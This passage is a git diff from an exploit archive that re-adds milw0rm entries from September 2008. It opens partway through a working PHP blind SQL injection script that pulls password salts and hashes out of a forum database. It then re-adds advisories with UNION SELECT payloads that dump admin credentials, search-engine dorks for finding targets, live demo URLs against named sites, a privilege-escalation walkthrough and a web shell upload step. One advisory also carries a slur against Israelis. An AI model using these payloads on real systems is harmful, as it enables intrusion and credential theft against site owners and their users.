Exiting ...'); + } +} +/////////////////////////////////////////////////////////////////////// +function get_salt() +{ + $len = 5; + $out = ''; + + xecho("Finding salt ...\n"); + + for($i = 1; $i < $len + 1; $i ++) + { + $ch = get_saltchar($i); + xecho("Got pos $i --> $ch\n"); + $out .= "$ch"; + xecho("Current salt: $out \n"); + } + + xecho("\nFinal salt: $out\n\n"); + + return $out; +} +/////////////////////////////////////////////////////////////////////// +function get_saltchar($pos) +{ + global $prefix, $id; + + $char = ''; + $min = 32; + $max = 128; + $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))"; + $curr = 0; + + while(1) + { + $area = $max - $min; + if($area < 2 ) + { + $post = $pattern . "=$max"; + $eq = test_condition($post); + + if($eq) + { + $char = chr($max); + } + else + { + $char = chr($min); + } + + break; + } + + $half = intval(floor($area / 2)); + $curr = $min + $half; + + $post = $pattern . '%253e' . $curr; + + $bigger = test_condition($post); + + if($bigger) + { + $min = $curr; + } + else + { + $max = $curr; + } + + xecho("Current test: $curr-$max-$min\n"); + } + + return $char; +} +/////////////////////////////////////////////////////////////////////// +function get_hash() +{ + $len = 32; + $out = ''; + + xecho("Finding hash ...\n"); + + for($i = 1; $i < $len + 1; $i ++) + { + $ch = get_hashchar($i); + xecho("Got pos $i --> $ch\n"); + $out .= "$ch"; + xecho("Current hash: $out \n"); + } + + xecho("\nFinal hash: $out\n\n"); + + return $out; +} +/////////////////////////////////////////////////////////////////////// +function get_hashchar($pos) +{ + global $prefix, $id; + + $char = ''; + $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))"; + + // First let's determine, if it's number or letter + $post = $pattern . 
'%253e57'; + $letter = test_condition($post); + + if($letter) + { + $min = 97; + $max = 102; + xecho("Char to find is [a-f]\n"); + } + else + { + $min = 48; + $max = 57; + xecho("Char to find is [0-9]\n"); + } + + $curr = 0; + + while(1) + { + $area = $max - $min; + if($area < 2 ) + { + $post = $pattern . "=$max"; + $eq = test_condition($post); + + if($eq) + { + $char = chr($max); + } + else + { + $char = chr($min); + } + + break; + } + + $half = intval(floor($area / 2)); + $curr = $min + $half; + + $post = $pattern . '%253e' . $curr; + + $bigger = test_condition($post); + + if($bigger) + { + $min = $curr; + } + else + { + $max = $curr; + } + + xecho("Current test: $curr-$max-$min\n"); + } + + return $char; +} +/////////////////////////////////////////////////////////////////////// +function test_condition($p) +{ + global $url; + + $bret = false; + $maxtry = 10; + $try = 1; + + $pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- '; + $post = sprintf($pattern, $p); + + while(1) + { + $buff = trim(make_post($url, $post, '', $url)); + + if($buff === 'found') + { + $bret = true; + break; + } + elseif($buff === 'notfound') + { + break; + } + elseif(strpos($buff, 'IPS Driver Error') !== false) + { + die("Sql error! Wrong prefix?\nExiting ... 
"); + } + else + { + xecho("test_condition() - try $try - invalid return value ...\n"); + $try ++; + if($try > $maxtry) + { + die("Too many tries - exiting ...\n"); + } + else + { + xecho("Trying again - try $try ...\n"); + } + } + } + + return $bret; +} +/////////////////////////////////////////////////////////////////////// +function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE) +{ + $ch = curl_init(); + $timeout = 120; + curl_setopt ($ch, CURLOPT_URL, $url); + curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); + curl_setopt($ch, CURLOPT_POST, 1); + curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); + curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)'); + + if(!empty($GLOBALS['proxy_ip_port'])) + { + curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']); + + if(!empty($GLOBALS['proxy_user_password'])) + { + curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']); + } + } + + if(!empty($cookie)) + { + curl_setopt ($ch, CURLOPT_COOKIE, $cookie); + } + + if(!empty($referer)) + { + curl_setopt ($ch, CURLOPT_REFERER, $referer); + } + + if($headers === TRUE) + { + curl_setopt ($ch, CURLOPT_HEADER, TRUE); + } + else + { + curl_setopt ($ch, CURLOPT_HEADER, FALSE); + } + + $fc = curl_exec($ch); + curl_close($ch); + + return $fc; +} +/////////////////////////////////////////////////////////////////////// +function add_line($line) +{ + global $outfile; + + $line .= "\n"; + $fh = fopen($outfile, 'ab'); + fwrite($fh, $line); + fclose($fh); + +} +/////////////////////////////////////////////////////////////////////// +function xecho($line) +{ + if($GLOBALS['cli']) + { + echo "$line"; + } + else + { + $line = nl2br(htmlspecialchars($line)); + echo "$line"; + } +} +////////////////////////////////////////////////////////////////////// +?> + +# milw0rm.com [2008-09-21] 
diff --git a/platforms/php/webapps/6508.txt b/platforms/php/webapps/6508.txt
index be7263b96..b87cbaeb9 100755
--- a/platforms/php/webapps/6508.txt
+++ b/platforms/php/webapps/6508.txt
@@ -1,33 +1,33 @@
- _____ ____ _____
- / _ \ /\ /\ / _ \ / _ \
- | | | | \ \/ / ||_| | | | | |
- | | | | \ / \_ | | | | |
- | |_| | / \ __\ | | |_| |
- \_____/ / /\ \ |____/ \_____/
- \/ \/
-
-[~] Basic PHP Events Lister Remote SQL Injection
-
-[~] Author: 0x90
-
-[~] HomePage: www.0x90.com.ar
-
-[~] Contact: Guns[at]0x90[dot]com[dot]ar
-
-[~] Script: Basic PHP Events Lister
-
-[~] site: http://www.mevin.com
-
-[~] Donload: http://www.mevin.com/downloads/Basic-php-events-lister1.0.zip
-
-[~] Vulnerability Class: SQL Injection
-
-[~] Online Demostration: http://www.mevin.com/downloads/events/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
-
-
-
-[~] Exploit:
-
-http://host/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
-
-# milw0rm.com [2008-09-21]
+ _____ ____ _____
+ / _ \ /\ /\ / _ \ / _ \
+ | | | | \ \/ / ||_| | | | | |
+ | | | | \ / \_ | | | | |
+ | |_| | / \ __\ | | |_| |
+ \_____/ / /\ \ |____/ \_____/
+ \/ \/
+
+[~] Basic PHP Events Lister Remote SQL Injection
+
+[~] Author: 0x90
+
+[~] HomePage: www.0x90.com.ar
+
+[~] Contact: Guns[at]0x90[dot]com[dot]ar
+
+[~] Script: Basic PHP Events Lister
+
+[~] site: http://www.mevin.com
+
+[~] Donload: http://www.mevin.com/downloads/Basic-php-events-lister1.0.zip
+
+[~] Vulnerability Class: SQL Injection
+
+[~] Online Demostration: http://www.mevin.com/downloads/events/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
+
+
+
+[~] Exploit:
+
+http://host/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6510.txt b/platforms/php/webapps/6510.txt
index b97449557..af4c54cf3 100755
--- a/platforms/php/webapps/6510.txt
+++ b/platforms/php/webapps/6510.txt
@@ -1,65 +1,65 @@ -[~] PHPKB Knowledge Base Software v1.5 Professional (email.php) - SQL Injection Vulnerability -[~] -[~] http://www.knowledgebase-script.com -[~] ---------------------------------------------------------- -[~] Bug founded by d3v1l -[~] -[~] Date: 20.09.2007 -[~] -[~] -[~] d3v1l@spoofer.com -[~] -[~] ----------------------------------------------------------- -[~] Greetz tO:- -[~] -[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) -[~] -[~] Pentest|Gibon|Pig -[~]------------------------------------------------------------- -[~] Exploit :- -[~] -[~] http://site.com/email.php?ID=SQL -[~] -[~] Demo :- -[~] -[~] -[~] http://xxxx.com/email.php?ID=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/* -[~] -[~]---------------------------------------------------------------------------------------------------------------------- - -2 - -[~] PHPKB Knowledge Base Software v1.5 Professional (question.php) - SQL Injection Vulnerability -[~] -[~] http://www.knowledgebase-script.com -[~] ---------------------------------------------------------- -[~] Bug founded by d3v1l -[~] -[~] Date: 20.09.2007 -[~] -[~] -[~] d3v1l@spoofer.com -[~] -[~] ----------------------------------------------------------- -[~] Greetz tO:- -[~] -[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) -[~] -[~] Pentest|Gibon|Pig -[~]------------------------------------------------------------- -[~] Exploit :- -[~] -[~] http://site.com/question.php?ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())/* -[~] http://site.com/question.php?ID=1 UNION SELECT concat(user,char(58),password) FROM mysql.user/* -[~] -[~] If he does not work test yet -> /question.php?ID=-1 -[~] -[~] Demo :- -[~] -[~] http://xxxx.com/kb/question.php?ID=1%20UNION%20SELECT%20concat(user,char(58),password)%20FROM%20mysql.user%20/* -[~] -[~] http://xxxx.com/kb/question.php?ID=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())/* -[~] 
-[~]---------------------------------------------------------------------------------------------------------------------- - -# milw0rm.com [2008-09-21] +[~] PHPKB Knowledge Base Software v1.5 Professional (email.php) - SQL Injection Vulnerability +[~] +[~] http://www.knowledgebase-script.com +[~] ---------------------------------------------------------- +[~] Bug founded by d3v1l +[~] +[~] Date: 20.09.2007 +[~] +[~] +[~] d3v1l@spoofer.com +[~] +[~] ----------------------------------------------------------- +[~] Greetz tO:- +[~] +[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) +[~] +[~] Pentest|Gibon|Pig +[~]------------------------------------------------------------- +[~] Exploit :- +[~] +[~] http://site.com/email.php?ID=SQL +[~] +[~] Demo :- +[~] +[~] +[~] http://xxxx.com/email.php?ID=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/* +[~] +[~]---------------------------------------------------------------------------------------------------------------------- + +2 + +[~] PHPKB Knowledge Base Software v1.5 Professional (question.php) - SQL Injection Vulnerability +[~] +[~] http://www.knowledgebase-script.com +[~] ---------------------------------------------------------- +[~] Bug founded by d3v1l +[~] +[~] Date: 20.09.2007 +[~] +[~] +[~] d3v1l@spoofer.com +[~] +[~] ----------------------------------------------------------- +[~] Greetz tO:- +[~] +[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) +[~] +[~] Pentest|Gibon|Pig +[~]------------------------------------------------------------- +[~] Exploit :- +[~] +[~] http://site.com/question.php?ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())/* +[~] http://site.com/question.php?ID=1 UNION SELECT concat(user,char(58),password) FROM mysql.user/* +[~] +[~] If he does not work test yet -> /question.php?ID=-1 +[~] +[~] Demo :- +[~] +[~] http://xxxx.com/kb/question.php?ID=1%20UNION%20SELECT%20concat(user,char(58),password)%20FROM%20mysql.user%20/* +[~] 
+[~] http://xxxx.com/kb/question.php?ID=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())/* +[~] +[~]---------------------------------------------------------------------------------------------------------------------- + +# milw0rm.com [2008-09-21] diff --git a/platforms/php/webapps/6511.txt b/platforms/php/webapps/6511.txt index ef73f736a..e3d01b6cc 100755 --- a/platforms/php/webapps/6511.txt +++ b/platforms/php/webapps/6511.txt 
@@ -1,64 +1,64 @@
-|___________________________________________________|
-|
-| 6rbScript V3.3 (singerid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-| Author: Hussin X
-|
-| Home : WwW.IQ-ty.CoM | WwW.TrYaG.CC
-|
-| email: darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|
-|___________________________________________________
-| |
-|
-| script : www.6rbscript.com
-|
-| DorK : inurl:"section.php?name=singers"
-| dorK : Powered By 6rbScript V3.3
-|___________________________________________________|
-
-
-Exploit:
-________
-
-
-user name
-_______
-
-www.[target].com/[PATS]/section.php?name=singers&f=songs&singerid=-1+union+select+1,aid,3,4,5,6+from+7addad_authors--
-
-
-password
-_______
-
-http://localhost/Script/section.php?name=singers&f=songs&singerid=-1+union+select+1,pwd,3,4,5,6+from+7addad_authors--
-
-
-
-
-Admin LogIn :
-
-www.[target].com/cpanel.php
-
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC |
-|
-| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
-|______________________________________________________________________
-
-
- Im IRAQi
-
-# milw0rm.com [2008-09-21]
+|___________________________________________________|
+|
+| 6rbScript V3.3 (singerid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+| Author: Hussin X
+|
+| Home : WwW.IQ-ty.CoM | WwW.TrYaG.CC
+|
+| email: darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|
+|___________________________________________________
+| |
+|
+| script : www.6rbscript.com
+|
+| DorK : inurl:"section.php?name=singers"
+| dorK : Powered By 6rbScript V3.3
+|___________________________________________________|
+
+
+Exploit:
+________
+
+
+user name
+_______
+
+www.[target].com/[PATS]/section.php?name=singers&f=songs&singerid=-1+union+select+1,aid,3,4,5,6+from+7addad_authors--
+
+
+password
+_______
+
+http://localhost/Script/section.php?name=singers&f=songs&singerid=-1+union+select+1,pwd,3,4,5,6+from+7addad_authors--
+
+
+
+
+Admin LogIn :
+
+www.[target].com/cpanel.php
+
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC |
+|
+| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
+|______________________________________________________________________
+
+
+ Im IRAQi
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6512.txt b/platforms/php/webapps/6512.txt
index 0f597efad..10828c40c 100755
--- a/platforms/php/webapps/6512.txt
+++ b/platforms/php/webapps/6512.txt
@@ -1,25 +1,25 @@
-Diesel Job Site Blind Sql Injection P0c
-Author : Stack
-Home Script : http://www.dieselscripts.com
-
-Desc :
-look the select Job Viewed: in [real id]+and+1=1 (true) the times change each time
-but in [real id]+and+1=0 (false) it remains stable
-
-go to url exploit or poc 2 or 3 times for see the difference
-between (true) and (false)
-
-P0c :
-http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+1=1
-http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+1=0
-Exploit :
-http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+substring(@@version,1,1)=5
-http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+substring(@@version,1,1)=4
-Live Demo P0c :
-http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+1=1
-http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+1=0
-Live Demo Exploit :
-http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=5
-http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=4
-
-# milw0rm.com [2008-09-21]
+Diesel Job Site Blind Sql Injection P0c
+Author : Stack
+Home Script : http://www.dieselscripts.com
+
+Desc :
+look the select Job Viewed: in [real id]+and+1=1 (true) the times change each time
+but in [real id]+and+1=0 (false) it remains stable
+
+go to url exploit or poc 2 or 3 times for see the difference
+between (true) and (false)
+
+P0c :
+http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+1=1
+http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+1=0
+Exploit :
+http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+substring(@@version,1,1)=5
+http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+substring(@@version,1,1)=4
+Live Demo P0c :
+http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+1=1
+http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+1=0
+Live Demo Exploit :
+http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=5
+http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=4
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6513.txt b/platforms/php/webapps/6513.txt
index f00e3e730..5c0c8c954 100755
--- a/platforms/php/webapps/6513.txt
+++ b/platforms/php/webapps/6513.txt
@@ -1,55 +1,55 @@ -============================================================ - Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability -============================================================ - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - -AUTHOR : CWH Underground -DATE : 21 September 2008 -SITE : cwh.citec.us - - -################################################################################### -APPLICATION : Rianxosencabos CMS -VERSION : 0.9 -DOWNLOAD : http://downloads.sourceforge.net/rsccms/rsccms.tar.gz -################################################################################### - - ---- Add-Admin / Delete-Account Vulnerability --- - - -------------- - Description -------------- - - Rianxosencabos CMS 0.9 has Vulnerability to escalate user to administartor's privilege. -That Vulnerable in "http://[Target]/[rsccms_path]/?s=admin&accion=lista" and You can Arbitrary change user's permission or delete user - - This action will give your account can use All Admin Control Panel with Administrative's Privilege or Arbitrary Delete account in website. 
- - --------------- - Exploit code --------------- -[+] Log in with your account, You can register with this URL "http://[Target]/[rsccms_path]/?s=usuarios&accion=registrar" -[+] Go to "http://[Target]/[rsccms_path]/?s=admin&accion=lista" -[+] Now you can Change user permission or delete user account - - -##################################################################### - Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos - Special Thx : asylu3, str0ke, citec.us, milw0rm.com -##################################################################### - -# milw0rm.com [2008-09-21] +============================================================ + Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability +============================================================ + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + +AUTHOR : CWH Underground +DATE : 21 September 2008 +SITE : cwh.citec.us + + +################################################################################### +APPLICATION : Rianxosencabos CMS +VERSION : 0.9 +DOWNLOAD : http://downloads.sourceforge.net/rsccms/rsccms.tar.gz +################################################################################### + + +--- Add-Admin / Delete-Account Vulnerability --- + + +------------- + Description +------------- + + Rianxosencabos CMS 0.9 has Vulnerability to escalate user to administartor's privilege. +That Vulnerable in "http://[Target]/[rsccms_path]/?s=admin&accion=lista" and You can Arbitrary change user's permission or delete user + + This action will give your account can use All Admin Control Panel with Administrative's Privilege or Arbitrary Delete account in website. 
+ + +-------------- + Exploit code +-------------- +[+] Log in with your account, You can register with this URL "http://[Target]/[rsccms_path]/?s=usuarios&accion=registrar" +[+] Go to "http://[Target]/[rsccms_path]/?s=admin&accion=lista" +[+] Now you can Change user permission or delete user account + + +##################################################################### + Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos + Special Thx : asylu3, str0ke, citec.us, milw0rm.com +##################################################################### + +# milw0rm.com [2008-09-21] diff --git a/platforms/php/webapps/6514.txt b/platforms/php/webapps/6514.txt index bb9ac22e9..e3b1e643c 100755 --- a/platforms/php/webapps/6514.txt +++ b/platforms/php/webapps/6514.txt 
@@ -1,65 +1,64 @@ - - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com - -<> Groups : InjEctOr5 T3am - - -======================================================= -+++++++++++++ R3membeR Kings of injection +++++++++++++ -======================================================= - - -<<->> script : Availscript Jobs Portal Script - -<<->> script site : www.availscript.com - - -======================================================= -++++++++++++++++ pWning israel fuckers ++++++++++++++++ -======================================================= - - -<<->> D0rk : N0-WaY - -<<->> Exploit : - - 1) first Register in site in ( Employers Signup ) ...... www.site.me/registeremp.php - - 2) login as Employer and goto Edit Image/Logo ..... www.site.me/employer/editlogo.php .. 
u can upload shell ( shell.php ) - - 3) hack site :) finished - -======================================================= -+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ -======================================================= - - - -<<->> InjEctOr5 TeaM :: InjEctOr $ haker-b0y $ Mr.Dangers $ Eng.Silent Night $ QalbHamad $ fisher762 $ Sp1d3r_N3T $ ToTaL $ z3rO s3v3n $ RooT-Hacker - -<<->> My best old freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ br1ght-dark $ Golden-zero - -<<->> Then TrYaG Te4m & there Forum ( www.tryag.cc/cc ) - -<<->> All muslims - -# milw0rm.com [2008-09-21] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com + +<> Groups : InjEctOr5 T3am + + +======================================================= ++++++++++++++ R3membeR Kings of injection +++++++++++++ +======================================================= + + +<<->> script : Availscript Jobs Portal Script + +<<->> script site : www.availscript.com + + +======================================================= +++++++++++++++++ pWning israel fuckers ++++++++++++++++ +======================================================= + + +<<->> D0rk : N0-WaY + +<<->> Exploit : + + 1) first Register in site in ( Employers Signup ) ...... 
www.site.me/registeremp.php + + 2) login as Employer and goto Edit Image/Logo ..... www.site.me/employer/editlogo.php .. u can upload shell ( shell.php ) + + 3) hack site :) finished + +======================================================= ++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ +======================================================= + + + +<<->> InjEctOr5 TeaM :: InjEctOr $ haker-b0y $ Mr.Dangers $ Eng.Silent Night $ QalbHamad $ fisher762 $ Sp1d3r_N3T $ ToTaL $ z3rO s3v3n $ RooT-Hacker + +<<->> My best old freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ br1ght-dark $ Golden-zero + +<<->> Then TrYaG Te4m & there Forum ( www.tryag.cc/cc ) + +<<->> All muslims + +# milw0rm.com [2008-09-21] diff --git a/platforms/php/webapps/6516.txt b/platforms/php/webapps/6516.txt index 9b5c65e1d..1faaf3491 100755 --- a/platforms/php/webapps/6516.txt +++ b/platforms/php/webapps/6516.txt 
@@ -1,36 +1,36 @@
-####################################################
-e107 Plugin Akira Powered's "Image Gallery" Remote SQL-injetion Vulnerability
-####################################################
-
-#####################################
-Author: boom3rang
-Site: www.khg-crew.ws
-Greetz: KHG & H!tm@N & chs & redc00de & proxy-ki11er
-Site: www.khg-crew.ws
-#####################################
-
-
-- Download Plugin: http://www.akirapowered.org/download.php?view.73
-
-- Dork:
-inurl:image_gallery.php?page=image-detail
-
-- POC:
-http://www.site.com/e107_Path/image_gallery/image_gallery.php?page=image-detail&album=1&image=[exploit]
-
-- Exploit:
--9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--
-
-- Live demo:
-http://www.ifitbleeds.net/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--
-
-
-
-#########################################
-- Kosova Hackers Group
-- United States of Albania
-- Proud to be Albanian
-- Proud to be Muslim
-#########################################
-
-# milw0rm.com [2008-09-21]
+####################################################
+e107 Plugin Akira Powered's "Image Gallery" Remote SQL-injetion Vulnerability
+####################################################
+
+#####################################
+Author: boom3rang
+Site: www.khg-crew.ws
+Greetz: KHG & H!tm@N & chs & redc00de & proxy-ki11er
+Site: www.khg-crew.ws
+#####################################
+
+
+- Download Plugin: http://www.akirapowered.org/download.php?view.73
+
+- Dork:
+inurl:image_gallery.php?page=image-detail
+
+- POC:
+http://www.site.com/e107_Path/image_gallery/image_gallery.php?page=image-detail&album=1&image=[exploit]
+
+- Exploit:
+-9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--
+
+- Live demo:
+http://www.ifitbleeds.net/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--
+
+
+
+#########################################
+- Kosova Hackers Group
+- United States of Albania
+- Proud to be Albanian
+- Proud to be Muslim
+#########################################
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6517.txt b/platforms/php/webapps/6517.txt
index 2710df754..54ee1dbf8 100755
--- a/platforms/php/webapps/6517.txt
+++ b/platforms/php/webapps/6517.txt
@@ -1,30 +1,30 @@
-######## ## ## ###### ######## ## ## ######## ######## ####### ########
-## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ##
-## #### ## ## ## ## #### ## ## ## ## ## ##
-###### ## ## ## ## ######## ## ######## ## ####### ## ##
-## ## #### ## ## ## ## ## ## ## ## ##
-## ## ### ## ## ## ## ## ## ## ## ## ## ##
-######## ## ## ###### ## ## ## ## ## ####### ########
-################################ !R4Q!4N H4CK3R ###################################
-NetArtMedia Jobs Portal 1.3 Multiple Sql Injection Vulnerabilities
-Website : http://www.netartmedia.net
-Founded By : Encrypt3d.M!nd
-Home Page : http://encrypt3d.blogspot.com
-
-# Remote Sql Injection(s) :
-Affected File(s) :
-index.php
-
-PoC:
-/index.php?mod=search&job=-666 union select 1,2,3,4,5,username,password,8,9,10,11,12,13,14 from websiteadmin_admin_users
-/index.php?page_id=-1&news_id=-666 union select 1,2,username,password,5,6 from websiteadmin_admin_users
-Administration Panel:
-/ADMIN/login.php
-
-# Greetz:
-MY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,
-KoRn The Dog,MiNi-SpIder,All My Friends
-
-The EnD :D
-
-# milw0rm.com [2008-09-21]
+######## ## ## ###### ######## ## ## ######## ######## ####### ########
+## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ##
+## #### ## ## ## ## #### ## ## ## ## ## ##
+###### ## ## ## ## ######## ## ######## ## ####### ## ##
+## ## #### ## ## ## ## ## ## ## ## ##
+## ## ### ## ## ## ## ## ## ## ## ## ## ##
+######## ## ## ###### ## ## ## ## ## ####### ########
+################################ !R4Q!4N H4CK3R ###################################
+NetArtMedia Jobs Portal 1.3 Multiple Sql Injection Vulnerabilities
+Website : http://www.netartmedia.net
+Founded By : Encrypt3d.M!nd
+Home Page : http://encrypt3d.blogspot.com
+
+# Remote Sql Injection(s) :
+Affected File(s) :
+index.php
+
+PoC:
+/index.php?mod=search&job=-666 union select 1,2,3,4,5,username,password,8,9,10,11,12,13,14 from websiteadmin_admin_users
+/index.php?page_id=-1&news_id=-666 union select 1,2,username,password,5,6 from websiteadmin_admin_users
+Administration Panel:
+/ADMIN/login.php
+
+# Greetz:
+MY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,
+KoRn The Dog,MiNi-SpIder,All My Friends
+
+The EnD :D
+
